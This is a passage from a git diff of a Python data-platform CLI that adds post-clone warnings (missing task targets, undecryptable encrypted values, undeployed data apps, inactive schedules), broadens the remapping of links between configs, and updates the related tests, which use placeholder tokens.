``_configuration_extra`` in place). A deep copy is code-merged to build the + PUT body (no-op for these components, which carry no code) so the API + receives the corrected configuration. The local file is rewritten even when + the PUT fails, and the manifest hash is then left as it was: the next push + sees a modified config and sends the ids again. """ merged = copy.deepcopy(local_data) merge_code_files(created.component_id, merged, created.config_dir) _name, _description, configuration = local_config_to_api(merged) - response = client.update_config( - component_id=created.component_id, - config_id=created.config_id, - configuration=configuration, - change_description="Remap flow task configIds via kbagent sync push", - branch_id=branch_id, - ) + try: + response = client.update_config( + component_id=created.component_id, + config_id=created.config_id, + configuration=configuration, + change_description="Remap linked config IDs via kbagent sync push", + branch_id=branch_id, + ) + finally: + service._write_config_file(created.config_dir, local_data) logger.info( - "Remapped flow task configIds for %s/%s", + "Remapped linked config IDs for %s/%s", created.component_id, created.config_id, ) - - service._write_config_file(created.config_dir, local_data) _refresh_binding_hashes( service, client, diff --git a/src/keboola_agent_cli/services/_sync_clone.py b/src/keboola_agent_cli/services/_sync_clone.py index cfb7184ec..305a1c1b5 100644 --- a/src/keboola_agent_cli/services/_sync_clone.py +++ b/src/keboola_agent_cli/services/_sync_clone.py @@ -4,7 +4,8 @@ delegator to :func:`clone_project` here; the pure, client-free override helpers live in ``..sync.clone``. This function only orchestrates: validate the reference, copy + re-point + parameterize the tree, run the fresh-target guard, -and push (so push Phase C/D remaps the flow/variable links). +and push (so push Phase C/D remaps the links between the configs), then list +what the target still needs in ``warnings``. """ from __future__ import annotations @@ -25,6 +26,7 @@ repoint_manifest_project, ) from ..sync.manifest import load_manifest, save_manifest +from ._sync_clone_warnings import collect_clone_warnings, read_encrypted_values from ._sync_storage import create_buckets_from_export from .base import find_default_branch_id @@ -59,8 +61,9 @@ def clone_project( Copies the reference tree at ``source`` into ``target_dir``, applies the declarative ``overrides`` (``bucket_map``, ``variable_values``, ``instance_rename``), re-points the manifest at ``target_alias``'s project, - and pushes -- so every config is CREATEd fresh and its flow task / variable - links are remapped reference->ULID by push Phase C/D. + and pushes -- so every config is CREATEd fresh and its links (flow and + orchestrator tasks, schedule targets, variables, shared code) are remapped + reference->ULID by push Phase C/D. Cloning into a fresh target needs no id surgery: the reference's config ids do not exist in the target remote, so the diff classifies every config as @@ -92,8 +95,11 @@ def clone_project( A dict matching ``CloneResult``: ``status`` (``cloned`` | ``no_changes`` | ``dry_run``), ``target_alias``, ``target_dir``, ``created``, ``bucket_rewrites``, ``variable_overrides``, - ``renamed_instances``, ``flow_task_remaps``, ``push`` (the underlying - push result), ``errors``. + ``renamed_instances``, ``flow_task_remaps`` (flow tasks only), + ``link_remaps`` (per kind), ``push`` (the underlying push result), + ``errors``, ``warnings`` (the push warnings plus the follow-ups the + target needs, see ``_sync_clone_warnings``; also on ``dry_run``; only + the run that creates the configs reports them). Raises: ConfigError: ``source`` is not a synced project, ``target_alias`` is @@ -176,13 +182,28 @@ def clone_project( "renamed_instances": renamed_instances, } + # Every run reads the diff before it pushes: the dry run reports it, the + # fresh-target guard checks it, and the encrypted values are read from the + # same changes. They are read before the push, because push encrypts a + # plaintext `#` value for the target and writes the ciphertext back. + diff_result = service.diff(target_alias, target_path, branch_override=branch_override) + changes = diff_result.get("changes", []) + tree_args: dict[str, Any] = { + "target_alias": target_alias, + "target_path": target_path, + "branch_override": branch_override, + } + encrypted = read_encrypted_values(service, changes=changes, **tree_args) + if dry_run: - diff_result = service.diff(target_alias, target_path, branch_override=branch_override) return { "status": "dry_run", "target_alias": target_alias, "target_dir": str(target_path), "summary": diff_result["summary"], + "warnings": collect_clone_warnings( + service, changes=changes, encrypted=encrypted, dry_run=True, **tree_args + ), **override_counts, } @@ -190,10 +211,9 @@ def clone_project( # CREATE. A non-'added' change means a reference id already exists in the # target -> not a fresh target; refuse rather than UPDATE a stranger's config. if not already_cloned: - diff_result = service.diff(target_alias, target_path, branch_override=branch_override) collisions = [ f"{c.get('component_id')}/{c.get('config_id')}" - for c in diff_result["changes"] + for c in changes if c["change_type"] != "added" ] if collisions: @@ -213,17 +233,26 @@ def clone_project( push_result = service.push(target_alias, target_path, branch_override=branch_override) status = "no_changes" if push_result.get("status") == "no_changes" else "cloned" + clone_warnings = collect_clone_warnings( + service, + changes=push_result.get("pushed_details", []), + encrypted=encrypted, + dry_run=False, + **tree_args, + ) return { "status": status, "target_alias": target_alias, "target_dir": str(target_path), "created": push_result.get("created", 0), "flow_task_remaps": push_result.get("flow_task_remaps", 0), + "link_remaps": push_result.get("link_remaps", {}), "buckets_created": len(bucket_result.created) if bucket_result else 0, "buckets_skipped": len(bucket_result.skipped) if bucket_result else 0, "bucket_errors": bucket_result.errors if bucket_result else [], "linked_buckets": bucket_result.linked if bucket_result else [], "push": push_result, "errors": push_result.get("errors", []), + "warnings": [*push_result.get("warnings", []), *clone_warnings], **override_counts, } diff --git a/src/keboola_agent_cli/services/_sync_clone_warnings.py b/src/keboola_agent_cli/services/_sync_clone_warnings.py new file mode 100644 index 000000000..da27a435d --- /dev/null +++ b/src/keboola_agent_cli/services/_sync_clone_warnings.py @@ -0,0 +1,399 @@ +"""The ``warnings[]`` of a ``sync clone`` result (CLI-24). + +A clone creates every config of the reference tree fresh in the target project +and push re-points the links between them. Some configs still need an action in +the target before they work, and nothing in the push result says so. This +module lists them, from the configs the clone created (or, for ``--dry-run``, +would create): + +- a flow / orchestration task that runs a config which is not in the tree, +- encrypted (``KBC::``) values, which only the reference project can decrypt, +- a data app, which sync creates but never deploys, +- a schedule, which sync never registers with the Scheduler service. + +Only the run that creates the configs reports them: a re-run that creates +nothing returns no warnings, so the caller must keep them. +""" + +from __future__ import annotations + +from dataclasses import dataclass, field +from pathlib import Path +from typing import TYPE_CHECKING, Any + +from ..constants import CONFIG_FILENAME +from ..sync.manifest import Manifest, load_manifest +from ._encryption import find_encrypted_secret_paths, find_unencryptable_secret_paths +from ._sync_bindings import task_config_ref +from ._sync_models import FLOW_COMPONENT_ID, ORCHESTRATOR_COMPONENT_ID, SCHEDULER_COMPONENT_ID +from .data_app_service import DATA_APP_COMPONENT_ID + +if TYPE_CHECKING: + from .sync_service import SyncService + +_TASK_OWNER_LABELS: dict[str, str] = { + FLOW_COMPONENT_ID: "Flow", + ORCHESTRATOR_COMPONENT_ID: "Orchestration", +} + +# Where a config's OAuth credentials sit in its local ``_config.yml``. They +# belong to the reference project's OAuth authorization, so the fix is a new +# authorization, not a plaintext value. +_OAUTH_PATH_PREFIX = "_configuration_extra.authorization.oauth_api." + + +@dataclass +class EncryptedValues: + """The ``KBC::`` values of one config and its rows, as ``_config.yml`` paths. + + ``secret_keys`` are under a ``#`` key: push encrypts a plaintext put there. + ``unencryptable_keys`` are under a plain key: push does not encrypt them. + ``oauth_keys`` are OAuth credentials. A row's paths start with the row path. + """ + + secret_keys: list[str] = field(default_factory=list) + unencryptable_keys: list[str] = field(default_factory=list) + oauth_keys: list[str] = field(default_factory=list) + + @property + def keys(self) -> list[str]: + return [*self.secret_keys, *self.unencryptable_keys, *self.oauth_keys] + + def add(self, local_data: dict[str, Any], prefix: str = "") -> None: + """Add the encrypted paths of one local ``_config.yml`` dict.""" + content = {key: value for key, value in local_data.items() if key != "_keboola"} + for path in find_encrypted_secret_paths(content): + self._bucket(path, self.secret_keys).append(f"{prefix}{path}") + for path in find_unencryptable_secret_paths(content): + self._bucket(path, self.unencryptable_keys).append(f"{prefix}{path}") + + def _bucket(self, path: str, default: list[str]) -> list[str]: + return self.oauth_keys if path.startswith(_OAUTH_PATH_PREFIX) else default + + +@dataclass(frozen=True) +class _ClonedConfig: + """A config the clone created, as its local ``_config.yml`` describes it.""" + + component_id: str + config_id: str + name: str + path: str + config_file: Path + data: dict[str, Any] + + @property + def label(self) -> str: + return f"'{self.name}' ({self.component_id}/{self.config_id})" + + @property + def extra(self) -> dict[str, Any]: + extra = self.data.get("_configuration_extra") + return extra if isinstance(extra, dict) else {} + + def record(self, change_type: str, message: str, **fields: Any) -> dict[str, Any]: + return { + "change_type": change_type, + "component_id": self.component_id, + "config_id": self.config_id, + "path": self.path, + "message": message, + **fields, + } + + +@dataclass(frozen=True) +class _WarningContext: + """What every warning of one clone run needs to know.""" + + target_alias: str + branch_override: int | None + dry_run: bool + tree_keys: set[tuple[str, str]] + schedules_per_flow: dict[str, int] + + @property + def branch_option(self) -> str: + return f" --branch {self.branch_override}" if self.branch_override is not None else "" + + +@dataclass(frozen=True) +class _CloneTree: + """The clone's manifest and the directory its branch's configs live in.""" + + manifest: Manifest + branch_id: int | None + branch_dir: Path + + +def _clone_tree( + service: SyncService, target_alias: str, target_path: Path, branch_override: int | None +) -> _CloneTree: + manifest = load_manifest(target_path) + branch_id = service._resolve_branch_id( + target_alias, manifest, target_path, branch_override=branch_override + ) + branch_path = service._resolve_source_branch_path(manifest, target_path, branch_id) + return _CloneTree(manifest=manifest, branch_id=branch_id, branch_dir=target_path / branch_path) + + +def _added(changes: list[dict[str, Any]]) -> list[dict[str, Any]]: + return [c for c in changes if c.get("change_type") == "added"] + + +def read_encrypted_values( + service: SyncService, + *, + target_alias: str, + target_path: Path, + branch_override: int | None, + changes: list[dict[str, Any]], +) -> dict[tuple[str, str], EncryptedValues]: + """Read the ``KBC::`` values of each config the clone creates, before the push. + + Push encrypts a plaintext ``#`` value for the target and writes the new + ciphertext back to the local file. After the push that value would look + like one copied from the reference, so the values are read first. The dry + run reads them the same way, from the same diff changes. Keyed by + ``(component_id, path)`` of the config change. + """ + added = _added(changes) + if not added: + return {} + tree = _clone_tree(service, target_alias, target_path, branch_override) + # A row change's path is relative to its parent config's directory. + row_paths_by_parent: dict[tuple[str, str], list[str]] = {} + for change in added: + if change.get("is_row"): + parent_key = (change["component_id"], str(change.get("parent_config_id", ""))) + row_paths_by_parent.setdefault(parent_key, []).append(change.get("path", "")) + + encrypted: dict[tuple[str, str], EncryptedValues] = {} + for change in added: + if change.get("is_row"): + continue + config_dir = tree.branch_dir / change.get("path", "") + local_data = service._read_config_file(config_dir) + if local_data is None: + continue + values = EncryptedValues() + values.add(local_data) + parent_key = (change["component_id"], str(change.get("config_id", ""))) + for row_path in row_paths_by_parent.get(parent_key, []): + row_data = service._read_config_file(config_dir / row_path) + if row_data is not None: + values.add(row_data, prefix=f"{row_path}: ") + if values.keys: + encrypted[(change["component_id"], change.get("path", ""))] = values + return encrypted + + +def collect_clone_warnings( + service: SyncService, + *, + target_alias: str, + target_path: Path, + branch_override: int | None, + changes: list[dict[str, Any]], + encrypted: dict[tuple[str, str], EncryptedValues], + dry_run: bool, +) -> list[dict[str, Any]]: + """Return one warning per follow-up the target project needs after a clone. + + ``changes`` are the diff changes (``--dry-run``) or the push + ``pushed_details``; only the ``added`` ones count. ``encrypted`` comes + from :func:`read_encrypted_values`, read before the push. After a push the + local files carry the target's new ids. For ``--dry-run`` they still carry + the reference ids, so those messages give no command with an id in it. + """ + added = [c for c in _added(changes) if not c.get("is_row")] + if not added: + return [] + tree = _clone_tree(service, target_alias, target_path, branch_override) + context = _WarningContext( + target_alias=target_alias, + branch_override=branch_override, + dry_run=dry_run, + tree_keys={(cfg.component_id, str(cfg.id)) for cfg in tree.manifest.configurations}, + schedules_per_flow=_schedules_per_flow(service, tree), + ) + + warnings: list[dict[str, Any]] = [] + for change in added: + component_id = change["component_id"] + path = change.get("path", "") + config_dir = tree.branch_dir / path + local_data = service._read_config_file(config_dir) + if local_data is None: + continue + written_id = (local_data.get("_keboola") or {}).get("config_id") + config = _ClonedConfig( + component_id=component_id, + config_id=str(written_id or change.get("config_id", "")), + name=str(local_data.get("name", "")), + path=path, + config_file=config_dir / CONFIG_FILENAME, + data=local_data, + ) + warnings.extend(_missing_task_targets(config, context)) + values = encrypted.get((component_id, path)) + if values is not None: + warnings.append(_encrypted_values_warning(config, values, context)) + if component_id == DATA_APP_COMPONENT_ID: + warnings.append(_data_app_warning(config, context)) + if component_id == SCHEDULER_COMPONENT_ID: + warnings.append(_schedule_warning(config, context)) + return warnings + + +def _schedules_per_flow(service: SyncService, tree: _CloneTree) -> dict[str, int]: + """Count the schedules in the tree's branch per flow id they run.""" + counts: dict[str, int] = {} + target_branch = tree.branch_id or 0 + for cfg in tree.manifest.configurations: + if cfg.component_id != SCHEDULER_COMPONENT_ID or cfg.branch_id != target_branch: + continue + local_data = service._read_config_file(tree.branch_dir / cfg.path) or {} + target = (local_data.get("_configuration_extra") or {}).get("target") + if isinstance(target, dict) and target.get("componentId") == FLOW_COMPONENT_ID: + flow_id = str(target.get("configurationId", "")) + counts[flow_id] = counts.get(flow_id, 0) + 1 + return counts + + +def _missing_task_targets(config: _ClonedConfig, context: _WarningContext) -> list[dict[str, Any]]: + """Warn for each flow / orchestration task that runs a config outside the tree.""" + owner = _TASK_OWNER_LABELS.get(config.component_id) + tasks = config.extra.get("tasks") + if owner is None or not isinstance(tasks, list): + return [] + warnings: list[dict[str, Any]] = [] + for task_entry in tasks: + ref = task_config_ref(config.component_id, task_entry) + if ref is None or ref in context.tree_keys: + continue + target_component_id, target_config_id = ref + task_name = task_entry.get("name", "") + task_id = task_entry.get("id", "") + message = ( + f"{owner} {config.label}, task '{task_name}' (id {task_id}), runs " + f"{target_component_id}/{target_config_id}, which is not in the cloned tree. The " + "target project has no such config, so the task fails. Create the config in the " + "target and point the task at it, or remove the task." + ) + warnings.append( + config.record( + "missing_task_target", + message, + task_id=task_id, + task_name=task_name, + target_component_id=target_component_id, + target_config_id=target_config_id, + ) + ) + return warnings + + +def _encrypted_values_warning( + config: _ClonedConfig, values: EncryptedValues, context: _WarningContext +) -> dict[str, Any]: + """Warn once per config that holds ``KBC::`` values, listing the keys (never the values).""" + count = len(values.keys) + parts = [ + ( + f"{config.label} holds {count} encrypted value(s) copied as-is from the " + "reference project. The target project cannot decrypt them." + ) + ] + if values.secret_keys: + listed = ", ".join(values.secret_keys) + parts.append( + f"Put the plaintext of these into {config.config_file} (a row's key into that " + f"row's file) and run `kbagent sync push`, which encrypts them for the target: " + f"{listed}. `kbagent config clone --target-project` handles this for a single " + "config with `--secret PATH=VALUE`." + ) + if values.unencryptable_keys: + listed = ", ".join(values.unencryptable_keys) + parts.append( + f"These are not under a `#` key, so push does not encrypt them: {listed}. Encrypt " + f"each value with `kbagent encrypt values --project {context.target_alias} " + f"--component-id {config.component_id}` and set the result in the file." + ) + if values.oauth_keys: + listed = ", ".join(values.oauth_keys) + parts.append( + f"These are OAuth credentials of the reference project: {listed}. Authorize the " + "config again in the target project (`kbagent config oauth-url` gives the link)." + ) + return config.record( + "encrypted_values_copied", + " ".join(parts), + keys=values.keys, + secret_keys=values.secret_keys, + unencryptable_keys=values.unencryptable_keys, + oauth_keys=values.oauth_keys, + ) + + +def _data_app_warning(config: _ClonedConfig, context: _WarningContext) -> dict[str, Any]: + """Warn that sync creates the data app but does not deploy it.""" + parameters = config.data.get("parameters") + app_id = str(parameters.get("id", "")) if isinstance(parameters, dict) else "" + message = f"sync clone does not deploy data app {config.label}." + if not context.dry_run and app_id: + message += ( + f" Deploy it with `kbagent data-app deploy --project {context.target_alias} " + f"--app-id {app_id}{context.branch_option}`." + ) + else: + message += " Deploy it with `kbagent data-app deploy` after the clone." + return config.record("data_app_not_deployed", message, app_id=app_id) + + +def _schedule_warning(config: _ClonedConfig, context: _WarningContext) -> dict[str, Any]: + """Report the schedule as not active: sync never registers it with the Scheduler service. + + The activation command is given only for a real clone of a schedule whose + flow is in the tree, because only then is the flow id the target's own. + """ + schedule = config.extra.get("schedule") + schedule = schedule if isinstance(schedule, dict) else {} + target = config.extra.get("target") + flow_id = ( + str(target.get("configurationId", "")) + if isinstance(target, dict) and target.get("componentId") == FLOW_COMPONENT_ID + else "" + ) + message = ( + f"sync clone does not activate schedule {config.label}: it is not registered with the " + "Scheduler service, so the target project starts no jobs from it." + ) + flow_in_tree = (FLOW_COMPONENT_ID, flow_id) in context.tree_keys + if not context.dry_run and flow_in_tree and schedule.get("cronTab"): + message += _schedule_hint(schedule, flow_id, context) + return config.record("schedule_not_active", message, active=False) + + +def _schedule_hint(schedule: dict[str, Any], flow_id: str, context: _WarningContext) -> str: + """Return how to activate a cloned schedule of a flow. + + ``flow schedule`` updates the first schedule it finds for a flow, so the + command is given only when the flow has exactly one schedule. + """ + flow_schedules = context.schedules_per_flow.get(flow_id, 0) + if flow_schedules > 1: + return ( + f" {flow_schedules} cloned schedules run flow {flow_id}, and `kbagent flow schedule` " + "updates only one schedule per flow. Activate these schedules in the Keboola UI." + ) + timezone = schedule.get("timezone", "") + options = f" --timezone {timezone}" if timezone else "" + if schedule.get("state") == "disabled": + options += " --disabled" + cron_tab = schedule["cronTab"] + return ( + f" To register it, run `kbagent flow schedule --project {context.target_alias} " + f"--flow-id {flow_id} --cron '{cron_tab}'{options}{context.branch_option}`, which " + "updates this schedule." + ) diff --git a/src/keboola_agent_cli/services/_sync_models.py b/src/keboola_agent_cli/services/_sync_models.py index 89df5a541..bdf419488 100644 --- a/src/keboola_agent_cli/services/_sync_models.py +++ b/src/keboola_agent_cli/services/_sync_models.py @@ -25,6 +25,20 @@ # remaps those ids placeholder/source -> ULID after a fresh create (e.g. clone). FLOW_COMPONENT_ID = "keboola.flow" +# Legacy flow component. Its tasks carry ``task.componentId`` + ``task.configId`` +# like a flow's, but no ``task.type``. +ORCHESTRATOR_COMPONENT_ID = "keboola.orchestrator" + +# A schedule runs ``configuration.target.componentId`` / +# ``configuration.target.configurationId``. +SCHEDULER_COMPONENT_ID = "keboola.scheduler" + +# Sibling component that backs a transformation's shared-code links. A +# transformation references it via ``configuration.shared_code_id`` (the +# config) and ``configuration.shared_code_row_ids`` (row ids), and its scripts +# use each row as a ``{{}}`` placeholder. +SHARED_CODE_COMPONENT_ID = "keboola.shared-code" + @dataclass class WritebackResult: @@ -56,11 +70,13 @@ class CreatedConfig: @dataclass class VariableBindingResult: - """Outcome of the Phase-C variable-link backfill. + """Outcome of the Phase-C transformation-link backfill (variables + shared code). - ``configs_rewritten`` counts transformations whose remote configuration + - local ``_configuration_extra`` were rebound to ULIDs (drives the - manifest-dirty flag). ``errors`` accumulates unresolved links so the push + ``configs_rewritten`` counts the rewrites (one per variables or shared-code + PUT) whose remote configuration + local ``_configuration_extra`` were + rebound to ULIDs (drives the manifest-dirty flag). ``shared_code_links`` + counts the transformations whose shared-code link was re-pointed. + ``errors`` accumulates unresolved links and failed PUTs so the push envelope surfaces them instead of leaving a broken link silently. ``warnings`` carries non-fatal baseline-stamping notices (issue #686). """ @@ -68,15 +84,19 @@ class VariableBindingResult: errors: list[dict[str, str]] = field(default_factory=list) warnings: list[dict[str, Any]] = field(default_factory=list) configs_rewritten: int = 0 + shared_code_links: int = 0 @dataclass class FlowBindingResult: - """Outcome of the Phase-D flow-task-link backfill (#426). - - ``configs_rewritten`` counts flows whose task ``configId``s were remapped to - ULIDs (drives the manifest-dirty flag); ``tasks_remapped`` is the total task - references rewritten; ``errors`` accumulates PUT failures so the push + """Outcome of the Phase-D backfill (#426, CLI-24). + + Phase D remaps the configs that flows, legacy orchestrations and schedules + run. ``configs_rewritten`` counts the configs whose task / target ids were + remapped to ULIDs (drives the manifest-dirty flag). The other counters are + the references rewritten per kind: flow task ``configId``s, orchestrator + task ``configId``s, schedule targets, and task ``configRowIds`` entries. + ``errors`` accumulates unmappable row ids and failed PUTs so the push envelope surfaces them. ``warnings`` carries non-fatal baseline-stamping notices (issue #686). """ @@ -84,7 +104,31 @@ class FlowBindingResult: errors: list[dict[str, str]] = field(default_factory=list) warnings: list[dict[str, Any]] = field(default_factory=list) configs_rewritten: int = 0 - tasks_remapped: int = 0 + flow_tasks: int = 0 + orchestrator_tasks: int = 0 + schedule_targets: int = 0 + config_row_ids: int = 0 + + def push_fields(self, shared_code_links: int) -> dict[str, Any]: + """Return the push-result keys for the link remaps of Phase C and D. + + ``flow_task_remaps`` keeps its meaning from before CLI-24 (flow task + ``configId``s only). ``link_remaps`` has one count per kind. Both are + left out when nothing was remapped. + """ + link_remaps = { + "flow_tasks": self.flow_tasks, + "orchestrator_tasks": self.orchestrator_tasks, + "schedule_targets": self.schedule_targets, + "shared_code": shared_code_links, + "config_row_ids": self.config_row_ids, + } + fields: dict[str, Any] = {} + if self.flow_tasks: + fields["flow_task_remaps"] = self.flow_tasks + if any(link_remaps.values()): + fields["link_remaps"] = link_remaps + return fields @dataclass diff --git a/src/keboola_agent_cli/services/sync_service.py b/src/keboola_agent_cli/services/sync_service.py index 110110929..585d78b25 100644 --- a/src/keboola_agent_cli/services/sync_service.py +++ b/src/keboola_agent_cli/services/sync_service.py @@ -78,7 +78,7 @@ effective_stored_hash, raise_on_legacy_boundary, ) -from ._sync_bindings import resolve_flow_task_bindings, resolve_variable_bindings +from ._sync_bindings import resolve_run_target_bindings, resolve_transformation_bindings from ._sync_branch import ( branch_link as _branch_link, ) @@ -1844,8 +1844,9 @@ def push( self._record_push_error(errors, change_type, component_id, config_id, exc) # ---- Phase B: row creates / updates / deletes ---------------- - # row placeholder id -> ULID; ULID parent -> rows created under it. - created_row_id_map: dict[str, str] = {} + # (ULID parent, row placeholder id) -> row ULID; ULID parent -> rows + # created under it. Keyed per parent: two configs can use one row id. + created_row_id_map: dict[tuple[str, str], str] = {} created_rows_by_parent: dict[str, list[str]] = {} for change in row_changes: change_type = change["change_type"] @@ -1881,7 +1882,7 @@ def push( created += 1 if new_row_id: if config_id: - created_row_id_map[config_id] = new_row_id + created_row_id_map[(effective_parent_id, config_id)] = new_row_id created_rows_by_parent.setdefault(effective_parent_id, []).append( new_row_id ) @@ -1899,8 +1900,8 @@ def push( raise self._record_push_error(errors, change_type, component_id, config_id, exc) - # ---- Phase C: variable-link backfill (KFR-03) ---------------- - binding = resolve_variable_bindings( + # ---- Phase C: variable + shared-code links (KFR-03, CLI-24) -- + binding = resolve_transformation_bindings( self, client, created_configs=created_configs, @@ -1915,15 +1916,16 @@ def push( if binding.configs_rewritten: manifest_dirty = True - # ---- Phase D: flow task configId backfill (#426) ------------- - # After variable links, remap keboola.flow task configIds that point - # at configs created this push (golden/placeholder -> ULID). Reuses - # created_id_map; a no-op when no flow was created. - flow_binding = resolve_flow_task_bindings( + # ---- Phase D: flow/orchestrator task + schedule target backfill + # After transformation links, remap the configIds that flows, + # orchestrations and schedules run when they point at configs created + # this push (golden/placeholder -> ULID). Reuses created_id_map. + flow_binding = resolve_run_target_bindings( self, client, created_configs=created_configs, created_id_map=created_id_map, + created_row_id_map=created_row_id_map, manifest=manifest, branch_id=branch_id, ) @@ -1947,8 +1949,7 @@ def push( } if warnings: result_data["warnings"] = warnings - if flow_binding.tasks_remapped: - result_data["flow_task_remaps"] = flow_binding.tasks_remapped + result_data.update(flow_binding.push_fields(binding.shared_code_links)) if name_drift_warnings and not no_name_drift_warnings: result_data["name_drift_warnings"] = name_drift_warnings if never_fetched: diff --git a/src/keboola_agent_cli/sync/clone.py b/src/keboola_agent_cli/sync/clone.py index 57fed0bc4..20f50ed18 100644 --- a/src/keboola_agent_cli/sync/clone.py +++ b/src/keboola_agent_cli/sync/clone.py @@ -6,8 +6,10 @@ project needs no id surgery: the reference's config ids do not exist in the target remote, so the diff classifies every config as ``added`` and the push assigns new ULIDs -- and because ``created_id_map`` is keyed by the reference id -(the manifest entry's id before writeback), the Phase-C variable links and the -Phase-D flow task ``configId``s remap reference->ULID automatically. +(the manifest entry's id before writeback), push remaps the links between the +configs reference->ULID automatically: Phase C the transformation variables and +shared-code links, Phase D the flow and orchestrator task ``configId``s (and +``configRowIds``) and the schedule targets. These functions are deliberately side-effecting but **pure of API calls**: they only touch the on-disk tree + the in-memory manifest, so they are unit-testable diff --git a/tests/test_result_models.py b/tests/test_result_models.py index 93b63a9ec..a4f98971d 100644 --- a/tests/test_result_models.py +++ b/tests/test_result_models.py @@ -199,6 +199,21 @@ def test_ok_false_on_errors(self) -> None: cr = CloneResult.model_validate({"status": "cloned", "errors": [{"message": "boom"}]}) assert cr.ok is False + def test_warnings_and_link_remaps(self) -> None: + # CLI-24: warnings do not make the clone fail; link_remaps counts per kind. + warning = {"change_type": "schedule_not_active", "message": "m", "active": False} + remaps = {"flow_tasks": 2, "orchestrator_tasks": 1, "schedule_targets": 1} + cr = CloneResult.model_validate( + {"status": "cloned", "warnings": [warning], "link_remaps": remaps} + ) + assert cr.warnings == [warning] + assert cr.link_remaps == remaps + assert cr.ok is True + + def test_warnings_and_link_remaps_default_empty(self) -> None: + cr = CloneResult.model_validate({"status": "no_changes"}) + assert cr.warnings == [] and cr.link_remaps == {} + def test_dry_run_without_push(self) -> None: cr = CloneResult.model_validate( {"status": "dry_run", "target_alias": "t", "bucket_rewrites": 1} diff --git a/tests/test_sync_clone.py b/tests/test_sync_clone.py index 1f3308a5b..1ff0b8863 100644 --- a/tests/test_sync_clone.py +++ b/tests/test_sync_clone.py @@ -16,7 +16,7 @@ from keboola_agent_cli.config_store import ConfigStore from keboola_agent_cli.errors import ConfigError, ErrorCode, KeboolaApiError from keboola_agent_cli.models import ProjectConfig -from keboola_agent_cli.services._sync_bindings import resolve_flow_task_bindings +from keboola_agent_cli.services._sync_bindings import resolve_run_target_bindings from keboola_agent_cli.services._sync_storage import _parse_bucket_id, create_buckets_from_export from keboola_agent_cli.services.sync_service import CreatedConfig, SyncService from keboola_agent_cli.sync.clone import ( @@ -362,17 +362,18 @@ def test_remaps_and_puts_flow(self, tmp_path: Path, tmp_config_dir: Path) -> Non created = [CreatedConfig("keboola.flow", "flow-new", flow_dir)] created_id_map = {("keboola.ex-http", "ext-golden"): "ext-new"} - result = resolve_flow_task_bindings( + result = resolve_run_target_bindings( svc, client, created_configs=created, created_id_map=created_id_map, + created_row_id_map={}, manifest=manifest, branch_id=None, ) assert result.configs_rewritten == 1 - assert result.tasks_remapped == 1 + assert result.flow_tasks == 1 # The flow was PUT with the remapped task configId. client.update_config.assert_called_once() put_config = client.update_config.call_args.kwargs["configuration"] @@ -416,15 +417,16 @@ def test_noop_when_no_match(self, tmp_path: Path, tmp_config_dir: Path) -> None: ) client = MagicMock() svc = _service(tmp_config_dir, client) - result = resolve_flow_task_bindings( + result = resolve_run_target_bindings( svc, client, created_configs=[CreatedConfig("keboola.flow", "flow-new", flow_dir)], created_id_map={("keboola.ex-http", "other-golden"): "x"}, + created_row_id_map={}, manifest=manifest, branch_id=None, ) - assert result.tasks_remapped == 0 + assert result.flow_tasks == 0 client.update_config.assert_not_called() diff --git a/tests/test_sync_clone_links.py b/tests/test_sync_clone_links.py new file mode 100644 index 000000000..84593dbc3 --- /dev/null +++ b/tests/test_sync_clone_links.py @@ -0,0 +1,1052 @@ +"""`sync clone` and `sync push` re-point links to the new ids and report the rest (CLI-24). + +The reference tree is built by the real ``init_sync`` + ``pull`` from a stateful +Storage fake, then the real ``clone_project`` (or a plain ``push``) writes it +into an empty target fake. Before CLI-24 push re-pointed only flow task +``configId``s and variables links: shared code, legacy orchestrator tasks, +schedule targets and task ``configRowIds`` kept the reference ids, and the +clone still reported ``status: cloned`` with no warning. +""" + +import copy +import itertools +import shutil +from collections.abc import Callable +from pathlib import Path +from typing import Any, Self +from unittest.mock import MagicMock, patch + +import pytest +import yaml +from typer.testing import CliRunner + +from keboola_agent_cli.cli import app +from keboola_agent_cli.config_store import ConfigStore +from keboola_agent_cli.constants import CONFIG_FILENAME +from keboola_agent_cli.errors import ErrorCode, KeboolaApiError +from keboola_agent_cli.models import ProjectConfig, TokenVerifyResponse +from keboola_agent_cli.services._sync_bindings import ( + _resolve_shared_code_link, + rewrite_shared_code_placeholders, + task_config_ref, +) +from keboola_agent_cli.services.sync_service import SyncService +from keboola_agent_cli.sync.clone import drop_source_pull_marks +from keboola_agent_cli.sync.manifest import load_manifest, save_manifest + +STACK = "https://connection.keboola.com" +REF_TOKEN = "901-11111-fakeReferenceTokenXXXXXXXXXXXX" +TGT_TOKEN = "902-22222-fakeTargetTokenXXXXXXXXXXXXXXX" +SOURCE_CIPHER = "KBC::ProjectSecure::SOURCE-PROJECT-BOUND-CIPHERTEXT" +TARGET_CIPHER_PREFIX = "KBC::ProjectSecure::TARGET-" + +SQL = "keboola.snowflake-transformation" +PY = "keboola.python-transformation-v2" +VARS = "keboola.variables" +SHARED = "keboola.shared-code" +EXTRACTOR = "keboola.ex-db-mysql" +DATA_APP = "keboola.data-apps" +FLOW = "keboola.flow" +ORCH = "keboola.orchestrator" +SCHED = "keboola.scheduler" +SANDBOX = "keboola.sandboxes" + +# Both shared-code configs use the same row id, so a row map keyed by the row +# id alone would point one of the transformations at the other one's row. +SHARED_ROW_ID = "shared-row" + + +def _config( + config_id: str, name: str, configuration: dict[str, Any], rows: list | None = None +) -> dict[str, Any]: + return { + "id": config_id, + "name": name, + "description": "", + "configuration": configuration, + "rows": rows or [], + } + + +def _row(row_id: str, name: str, configuration: dict[str, Any]) -> dict[str, Any]: + return {"id": row_id, "name": name, "description": "", "configuration": configuration} + + +def _component(component_id: str, type_: str, *configs: dict[str, Any]) -> dict[str, Any]: + return {"id": component_id, "type": type_, "configurations": list(configs)} + + +def _job_task(task_id: int, name: str, component_id: str, config_id: str) -> dict[str, Any]: + return { + "id": task_id, + "name": name, + "phase": 1, + "enabled": True, + "task": {"type": "job", "componentId": component_id, "configId": config_id, "mode": "run"}, + } + + +def _blocks(*codes: tuple[str, list[str]]) -> dict[str, Any]: + return { + "blocks": [ + {"name": "B1", "codes": [{"name": name, "script": script} for name, script in codes]} + ] + } + + +def _schedule(config_id: str, name: str, state: str = "enabled") -> dict[str, Any]: + return _config( + config_id, + name, + { + "schedule": {"cronTab": "0 3 * * *", "timezone": "UTC", "state": state}, + "target": {"componentId": FLOW, "configurationId": "flow-ref", "mode": "run"}, + }, + ) + + +def _reference_components() -> list[dict[str, Any]]: + """A reference project whose configs link to each other in every way sync 